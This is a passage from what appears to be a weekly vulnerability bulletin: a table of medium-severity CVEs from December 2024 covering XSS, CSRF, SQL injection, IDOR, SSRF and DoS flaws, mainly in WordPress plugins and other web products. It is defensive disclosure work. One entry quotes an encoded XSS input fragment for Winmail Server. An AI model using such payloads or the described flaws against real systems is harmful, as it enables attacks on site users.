Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, and 9.5.x <= 9.5.12 fail to prevent concurrently checking and updating the failed login attempts. which allows an attacker to bypass of "Max failed attempts" restriction and send a big number of login attempts before being blocked via simultaneously sending multiple login requests | 2024-12-16 | 4.8 | CVE-2024-48872 |
| Meini--Utech World Time |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meini Utech World Time allows Stored XSS.This issue affects Utech World Time: from n/a through 1.0. | 2024-12-16 | 6.5 | CVE-2024-54441 |
| memberful--Memberful Membership Plugin |
The Memberful plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.73.9 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as site members. | 2024-12-17 | 5.3 | CVE-2024-11294 |
| Microsoft--Windows |
An access violation vulnerability exists in the DirectComposition functionality win32kbase.sys driver version 10.0.22000.593 as part of Windows 11 version 22000.593 and version 10.0.20348.643 as part of Windows Server 2022 version 20348.643. A specially-crafted set of syscalls can lead to a reboot. An unprivileged user can run specially-crafted code to trigger Denial Of Service. | 2024-12-18 | 5 | CVE-2022-40732 |
| Microsoft--Windows |
An access violation vulnerability exists in the DirectComposition functionality win32kbase.sys driver version 10.0.22000.593 as part of Windows 11 version 22000.593 and version 10.0.20348.643 as part of Windows Server 2022 version 20348.643. A specially-crafted set of syscalls can lead to a reboot. An unprivileged user can run specially-crafted code to trigger Denial Of Service. | 2024-12-18 | 5 | CVE-2022-40733 |
| misskey-dev--misskey |
Misskey is an open source, federated social media platform. Some APIs using `HttpRequestService` do not properly check the target host. This vulnerability allows an attacker to send POST or GET requests to the internal server, which may result in a SSRF attack.It allows an attacker to send POST or GET requests (with some controllable URL parameters) to private IPs, enabling further attacks on internal servers. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | 6.4 | CVE-2024-52579 |
| mohammed_kaludi--AMP for WP Accelerated Mobile Pages |
The AMP for WP - Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-18 | 6.1 | CVE-2024-11254 |
| moonheart--G Web Pro Store Locator |
The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-11682 |
| motovnet--Ebook Store |
The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-11287 |
| motovnet--Ebook Store |
The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'step' parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-12262 |
| n/a--Emlog Pro |
A vulnerability was found in Emlog Pro up to 2.4.1. It has been classified as problematic. This affects an unknown part of the file /admin/tag.php. The manipulation of the argument keyword leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-20 | 4.3 | CVE-2024-12841 |
| n/a--Emlog Pro |
A vulnerability was found in Emlog Pro up to 2.4.1. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/user.php. The manipulation of the argument keyword leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-20 | 4.3 | CVE-2024-12842 |
| n/a--Emlog Pro |
A vulnerability was found in Emlog Pro up to 2.4.1. It has been rated as problematic. This issue affects some unknown processing of the file /admin/plugin.php. The manipulation of the argument filter leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-20 | 4.3 | CVE-2024-12843 |
| n/a--Emlog Pro |
A vulnerability classified as problematic has been found in Emlog Pro up to 2.4.1. Affected is an unknown function of the file /admin/store.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-20 | 4.3 | CVE-2024-12844 |
| n/a--Emlog Pro |
A vulnerability, which was classified as problematic, has been found in Emlog Pro up to 2.4.1. Affected by this issue is some unknown functionality of the file /admin/link.php. The manipulation of the argument siteurl/icon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-21 | 4.3 | CVE-2024-12846 |
| n/a--InvoicePlane |
A vulnerability was found in InvoicePlane up to 1.6.1. It has been declared as critical. This vulnerability affects the function upload_file of the file /index.php/upload/upload_file/1/1. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2024-12-16 | 6.3 | CVE-2024-12478 |
| n/a--InvoicePlane |
A vulnerability was found in InvoicePlane up to 1.6.1. It has been classified as problematic. This affects the function download of the file invoices.php. The manipulation of the argument invoice leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2024-12-16 | 4.3 | CVE-2024-12362 |
| n/a--n/a |
A NULL pointer dereference in D-Link DIR-860L REVB_FIRMWARE_2.04.B04_ic5b allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2024-12-17 | 6.5 | CVE-2024-37605 |
| n/a--n/a |
A Stack overflow vulnerability in D-Link DCS-932L REVB_FIRMWARE_2.18.01 allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2024-12-17 | 6.5 | CVE-2024-37606 |
| n/a--n/a |
A Buffer overflow vulnerability in D-Link DAP-2555 REVA_FIRMWARE_1.20 allows remote attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2024-12-17 | 6.5 | CVE-2024-37607 |
| n/a--n/a |
A stored HTML Injection vulnerability was identified in PHPGurukul Online Birth Certificate System v1.0 in /user/certificate-form.php. | 2024-12-17 | 6.1 | CVE-2024-55059 |
| n/a--n/a |
Oqtane Framework is vulnerable to Insecure Direct Object Reference (IDOR) in Oqtane.Controllers.UserController. This allows unauthorized users to access sensitive information of other users by manipulating the id parameter. | 2024-12-20 | 6.5 | CVE-2024-55471 |
| n/a--n/a |
Winmail Server 4.4 is vulnerable to f_user=%22%3E%3Csvg%20onload Cross Site Scripting (XSS). | 2024-12-18 | 6.1 | CVE-2024-55492 |
| n/a--n/a |
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_sfmig.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions. | 2024-12-17 | 6.3 | CVE-2024-55514 |
| n/a--n/a |
CyberPanel (aka Cyber Panel) before f0cf648 allows XSS via token or username to plogical/phpmyadminsignin.php. | 2024-12-16 | 6.1 | CVE-2024-56112 |
| n/a--n/a |
In Optimizely Configured Commerce before 5.2.2408, malicious payloads can be stored and subsequently executed in users' browsers under specific conditions: XSS from client-side template injection in list item names. | 2024-12-18 | 6.1 | CVE-2024-56175 |
| n/a--n/a |
A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information. | 2024-12-17 | 5.7 | CVE-2024-10973 |
| n/a--n/a |
A NULL pointer dereference in the plugins_call_handle_uri_clean function of D-Link DAP-1520 REVA_FIRMWARE_1.10B04_BETA02_HOTFIX allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request without authentication. | 2024-12-17 | 5.3 | CVE-2024-36831 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability was identified in Phpgurukul Online Birth Certificate System 1.0 in /user/certificate-form.php via the full name field. | 2024-12-17 | 5.4 | CVE-2024-55056 |
| n/a--n/a |
Phpgurukul Online Birth Certificate System 1.0 suffers from insufficient password requirements which can lead to unauthorized access to user accounts. | 2024-12-17 | 5.4 | CVE-2024-55057 |
| n/a--n/a |
A URL redirection vulnerability exists in UJCMS 9.6.3 due to improper validation of URLs in the upload and rendering of new block / carousel items. This vulnerability allows authenticated attackers to redirect unprivileged users to an arbitrary, attacker-controlled webpage. When an authenticated user clicks on the malicious block item, they are redirected to the arbitrary untrusted domains, where sensitive tokens, such as JSON Web Tokens, can be stolen via a crafted webpage. | 2024-12-16 | 5.4 | CVE-2024-55452 |
| n/a--n/a |
Intrexx Portal Server before 12.0.2 allows XSS via a user-defined portlet. | 2024-12-16 | 5.4 | CVE-2024-55554 |
| n/a--n/a |
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads while creating Search Template Dashboard. These are executed, leading to Server-Side Template Injection. | 2024-12-16 | 5.9 | CVE-2024-56085 |
| n/a--n/a |
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads while querying Search Template Dashboard. These are executed, leading to Server-Side Template Injection. | 2024-12-16 | 5.9 | CVE-2024-56087 |
| n/a--n/a |
An HTML injection vulnerability in Sunbird DCIM dcTrack 9.1.2 allows attackers authenticated as administrators to inject arbitrary HTML code in an admin screen. | 2024-12-16 | 4.8 | CVE-2024-37773 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in Sunbird DCIM dcTrack v9.1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in some admin screens. | 2024-12-16 | 4.8 | CVE-2024-37776 |
| n/a--n/a |
Keyfactor Remote File Orchestrator (aka remote-file-orchestrator) 2.8 before 2.8.1 allows Information Disclosure: sensitive information could be exposed at the debug logging level. | 2024-12-18 | 4.3 | CVE-2024-49201 |
| n/a--n/a |
An insecure direct object reference (IDOR) vulnerability was discovered in PHPGurukul Online Birth Certificate System v1.0. This vulnerability resides in the viewid parameter of /user/view-application-detail.php. Authenticated users can exploit this flaw by manipulating the viewid parameter in the URL to access sensitive birth certificate details of other users without proper authorization checks. | 2024-12-17 | 4.3 | CVE-2024-55058 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the component /admin/profile.php of Online Nurse Hiring System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the fullname parameter. | 2024-12-16 | 4.8 | CVE-2024-55100 |
| n/a--n/a |
An IDOR (Insecure Direct Object Reference) vulnerability exists in oqtane Framework 6.0.0, allowing a logged-in user to access inbox messages of other users by manipulating the notification ID in the request URL. By changing the notification ID, an attacker can view sensitive mail details belonging to other users. | 2024-12-20 | 4.3 | CVE-2024-55186 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in Piranha CMS 11.1 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by creating a page via the /manager/pages and then adding a markdown content with the XSS payload. | 2024-12-20 | 4.7 | CVE-2024-55341 |
| n/a--n/a |
A file upload functionality in Piranha CMS 11.1 allows authenticated remote attackers to upload a crafted PDF file to /manager/media. This PDF can contain malicious JavaScript code, which is executed when a victim user opens or interacts with the PDF in their web browser, leading to a XSS vulnerability. | 2024-12-20 | 4.7 | CVE-2024-55342 |
| n/a--n/a |
A Stored Cross-Site Scripting (XSS) vulnerability exists in authenticated SVG file upload and viewing functionality in UJCMS 9.6.3. The vulnerability arises from insufficient sanitization of embedded attributes in uploaded SVG files. When a maliciously crafted SVG file is viewed by other backend users, it allows authenticated attackers to execute arbitrary JavaScript in the context of other backend users' browsers, potentially leading to the theft of sensitive tokens. | 2024-12-16 | 4.8 | CVE-2024-55451 |
| n/a--n/a |
In Optimizely Configured Commerce before 5.2.2408, malicious payloads can be stored and subsequently executed in users' browsers under specific conditions: XSS from JavaScript in an SVG document. | 2024-12-18 | 4.7 | CVE-2024-56173 |
| n/a--PbootCMS |
A vulnerability was found in PbootCMS up to 3.2.3. It has been classified as critical. This affects an unknown part of the file apps/home/controller/IndexController.php. The manipulation of the argument tag leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.4 is able to address this issue. It is recommended to upgrade the affected component. | 2024-12-19 | 6.3 | CVE-2024-12789 |
| n/a--PbootCMS |
A vulnerability, which was classified as problematic, has been found in PbootCMS up to 5.2.3. Affected by this issue is some unknown functionality of the file apps/home/controller/IndexController.php. The manipulation of the argument tag leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.4 is able to address this issue. It is recommended to upgrade the affected component. | 2024-12-19 | 4.3 | CVE-2024-12793 |
| NextGeography--NG Analyser |
Authorization Bypass Through User-Controlled Key vulnerability in NextGeography NG Analyser allows Functionality Misuse.This issue affects NG Analyser: before 2.2.711. | 2024-12-17 | 6.5 | CVE-2024-9819 |
| nicheaddons--Events Addon for Elementor |
The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-12-18 | 4.3 | CVE-2024-12061 |
| ninjateam--File Manager Pro Filester |
The File Manager Pro - Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_install_plugin' function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin. | 2024-12-19 | 4.3 | CVE-2024-12331 |
| Open Tools--WooCommerce Basic Ordernumbers |
Missing Authorization vulnerability in Open Tools WooCommerce Basic Ordernumbers allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Basic Ordernumbers: from n/a through 1.4.4. | 2024-12-16 | 5.4 | CVE-2024-55992 |
| outdooractive--Outdooractive Embed |
The Outdooractive Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'list2go' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11774 |
| philantro--Philantro Donations and Donor Management |
The Philantro - Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-12500 |
| PickPlugins--Job Board Manager |
Missing Authorization vulnerability in PickPlugins Job Board Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Job Board Manager: from n/a through 2.1.60. | 2024-12-16 | 5.3 | CVE-2024-55993 |
| pingmeter--Pingmeter Uptime Monitoring |
The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-11808 |
| Pixelgrade--PixProof |
Missing Authorization vulnerability in Pixelgrade PixProof allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects PixProof: from n/a through 2.0.1. | 2024-12-16 | 5.3 | CVE-2024-54417 |
| pkthree--Peters Custom Anti-Spam |
The Peter's Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-18 | 5.4 | CVE-2024-12554 |
| pluginsandsnippets--Simple Page Access Restriction |
The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users. | 2024-12-18 | 5.3 | CVE-2024-11295 |
| Pluginscafe--Advanced Data Table For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pluginscafe Advanced Data Table For Elementor allows Stored XSS.This issue affects Advanced Data Table For Elementor: from n/a through 1.0.0. | 2024-12-16 | 6.5 | CVE-2024-54443 |
| Posti--Posti Shipping |
Cross-Site Request Forgery (CSRF) vulnerability in Posti Posti Shipping allows Cross Site Request Forgery.This issue affects Posti Shipping: from n/a through 3.10.3. | 2024-12-16 | 6.5 | CVE-2024-56005 |
| premila--Gutensee |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in premila Gutensee allows DOM-Based XSS.This issue affects Gutensee: from n/a through 1.0.1. | 2024-12-16 | 6.5 | CVE-2024-54360 |
| puckrobin--WP BASE Booking of Appointments, Services and Events |
The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'status' parameter in all versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12469 |
| puckrobin--WP BASE Booking of Appointments, Services and Events |
The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password. | 2024-12-21 | 6.5 | CVE-2024-12558 |
| QNAP Systems Inc.--QTS |
An uncontrolled resource consumption vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2277 and later QTS 4.5.4.2280 build 20230112 and later QuTS hero h5.0.1.2277 build 20230112 and later QuTS hero h4.5.4.2374 build 20230417 and later QuTScloud c5.0.1.2374 and later | 2024-12-19 | 6.8 | CVE-2022-27600 |
| QNAP Systems Inc.--QuFirewall |
A command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QuFirewall 2.3.3 ( 2023/03/27 ) and later and later | 2024-12-19 | 5.5 | CVE-2023-23356 |
| QNAP Systems Inc.--QuLog Center |
A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QuLog Center 1.5.0.738 ( 2023/03/06 ) and later QuLog Center 1.4.1.691 ( 2023/03/01 ) and later QuLog Center 1.3.1.645 ( 2023/02/22 ) and later | 2024-12-19 | 4.8 | CVE-2023-23357 |
| quomodosoft--ElementsReady Addons for Elementor |
The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc/Widgets/accordion/output/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. | 2024-12-17 | 4.3 | CVE-2024-10356 |
| Ram Segev--Leader |
Missing Authorization vulnerability in Ram Segev Leader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leader: from n/a through 2.6.1. | 2024-12-16 | 4.3 | CVE-2024-56007 |
| reactflow--Reactflow Visitor Recording and Heatmaps |
The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-11975 |
| realmaster-1--real.Kit |
The real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-12697 |
| Red Hat--Red Hat OpenShift Container Platform 4 |
An incomplete fix for ose-olm-catalogd-container was issued for the Rapid Reset Vulnerability (CVE-2023-39325/CVE-2023-44487) where only unauthenticated streams were protected, not streams created by authenticated sources. | 2024-12-18 | 6.5 | CVE-2024-12698 |
| Red Hat--Red Hat Satellite 6 |
A server-side request forgery exists in Satellite. When a PUT HTTP request is made to /http_proxies/test_connection, when supplied with the http_proxies variable set to localhost, the attacker can fetch the localhost banner. | 2024-12-20 | 5 | CVE-2024-12840 |
| rewardsfuel--Contests by Rewards Fuel |
The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RF_CONTEST' shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-12513 |
| rluks--Embed Twine |
The Embed Twine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embed_twine' shortcode in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-12509 |
| Ryan--Bet sport Free |
Cross-Site Request Forgery (CSRF) vulnerability in Ryan Bet sport Free allows Cross Site Request Forgery.This issue affects Bet sport Free: from n/a through 1.0.0. | 2024-12-16 | 4.3 | CVE-2024-54396 |
| seopilot--Wtyczka SeoPilot dla WP |
The Wtyczka SeoPilot dla WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.091. This is due to missing or incorrect nonce validation on the SeoPilot_Admin_Options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-20 | 6.1 | CVE-2024-11812 |
| shabti--Frontend Admin by DynamiApps |
The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page. | 2024-12-21 | 5.9 | CVE-2024-11722 |
| ShineTheme--Travel Booking WordPress Theme |
The Travel Booking WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '__stPartnerCreateServiceRental', 'st_delete_order_item', '_st_partner_approve_booking', 'save_order_item', and '__userDenyEachInfo' functions in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify posts, delete posts and pages, approve arbitrary orders, insert orders with arbitrary prices, and deny user information. | 2024-12-18 | 6.5 | CVE-2024-11926 |
| Sierra Wireless--AirVantage, AirVantage-Capable Devices: All Sierra Wireless devices. |
An AirVantage online Warranty Checker tool vulnerability could allow an attacker to perform bulk enumeration of IMEI and Serial Numbers pairs. The AirVantage Warranty Checker is updated to no longer return the IMEI and Serial Number in addition to the warranty status when the Serial Number or IMEI is used to look up warranty status. | 2024-12-21 | 5.3 | CVE-2023-31280 |
| silabs.com--RS9116 Bluetooth SDK |
The L2CAP receive data buffer for L2CAP packets is restricted to packet sizes smaller than the maximum supported packet size. Receiving a packet that exceeds the restricted buffer length may cause a crash. A hard reset is required to recover the crashed device. | 2024-12-19 | 6.5 | CVE-2024-7137 |
| silabs.com--RS9116 Bluetooth SDK |
An assert may be triggered, causing a temporary denial of service when a peer device sends a specially crafted malformed L2CAP packet. If a watchdog timer is not enabled, a hard reset is required to recover the device. | 2024-12-19 | 6.5 | CVE-2024-7138 |
| silabs.com--RS9116 Bluetooth SDK |
Due to an unchecked buffer length, a specially crafted L2CAP packet can cause a buffer overflow. This buffer overflow triggers an assert, which results in a temporary denial of service. If a watchdog timer is not enabled, a hard reset is required to recover the device. | 2024-12-19 | 6.5 | CVE-2024-7139 |
| sisoog-- |
The استخراج Ù…Øصولات ووکامرس برای آیسی plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-20 | 6.1 | CVE-2024-11331 |
| slopeit--Slope Widgets |
The Slope Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slope-reservations' shortcode in all versions up to, and including, 4.2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-17 | 6.4 | CVE-2024-11902 |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy |
The Easy Digital Downloads - eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2024-12-21 | 4.9 | CVE-2024-12875 |
| socratous139--Spotlightr |
The Spotlightr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spotlightr-v' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11411 |
| solitweb--Full Screen Menu for Elementor |
The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to. | 2024-12-21 | 4.3 | CVE-2024-10797 |
| spoki--Spoki Chat Buttons and WooCommerce Notifications |
The Spoki - Chat Buttons and WooCommerce Notifications plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spoki_button' shortcode in all versions up to, and including, 2.15.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11893 |
| spreadr--Spreadr Woocommerce |
Missing Authorization vulnerability in spreadr Spreadr Woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Spreadr Woocommerce: from n/a through 1.0.4. | 2024-12-16 | 5.3 | CVE-2024-56009 |
| taeggie--Taeggie Feed |
The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'taeggie-feed' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-11748 |
| theafricanboss--SMS for WooCommerce |
The SMS for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12220 |
| ThemeFusion--Avada |
Cross-Site Request Forgery (CSRF) vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.10. | 2024-12-16 | 4.3 | CVE-2024-54357 |
| ticketsource--Sell Tickets Online TicketSource Ticket Shop |
The Sell Tickets Online - TicketSource Ticket Shop for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ticketshop' shortcode in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11784 |
| tomroyal--Stop Registration Spam |
The Stop Registration Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12219 |
| TreasureHuntGame--TreasureHunt |
A vulnerability, which was classified as critical, was found in TreasureHuntGame TreasureHunt up to 963e0e0. Affected is an unknown function of the file TreasureHunt/acesso.php. The manipulation of the argument usuario leads to sql injection. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 8bcc649abc35b7734951be084bb522a532faac4e. It is recommended to apply a patch to fix this issue. | 2024-12-22 | 6.3 | CVE-2024-12894 |
